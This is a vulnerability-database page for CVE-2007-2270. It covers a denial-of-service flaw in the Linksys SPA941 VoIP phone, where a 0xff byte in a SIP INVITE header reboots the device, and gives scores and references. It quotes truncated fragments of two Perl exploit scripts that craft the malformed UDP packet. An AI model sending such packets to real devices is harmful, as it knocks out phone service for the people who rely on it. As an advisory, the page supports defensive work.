Published: 25/04/2007 Updated: 11/10/2017

CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10

VMScore: 790

Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C

The Linksys SPA941 VoIP Phone allows remote malicious users to cause a denial of service (device reboot) via a 0377 (0xff) character in the From header, and possibly certain other locations, in a SIP INVITE request.

Vulnerable Product	Search on Vulmon	Subscribe to Product
linksys spa941

#!/usr/bin/perl use IO::Socket::INET; die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]); $socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], Proto=>'udp', PeerAddr=>$ARGV[0]); $msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/20\377\r Via: SIP/20/UDP 19216812 ...

#!/usr/bin/perl use IO::Socket; #die "Usage $0 <username> <dst_IP> <Source_IP> <SourcePort>" unless ($ARGV[2]); die "Usage $0 <username> <dst_IP> <SourceIp> <sourceport>" unless ($ARGV[0]); my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort => $ARGV[3], Proto => 'u ...

NVD-CWE-Other http://www.securityfocus.com/bid/23619 http://lists.grok.org.uk/pipermail/full-disclosure/2007-April/053959.html http://www.securitytracker.com/id?1017957 http://secunia.com/advisories/25031 http://www.vupen.com/english/advisories/2007/1532 https://exchange.xforce.ibmcloud.com/vulnerabilities/33856 https://www.exploit-db.com/exploits/3792 https://www.exploit-db.com/exploits/3791 https://nvd.nist.gov https://www.exploit-db.com/exploits/3791/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2007-2270

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect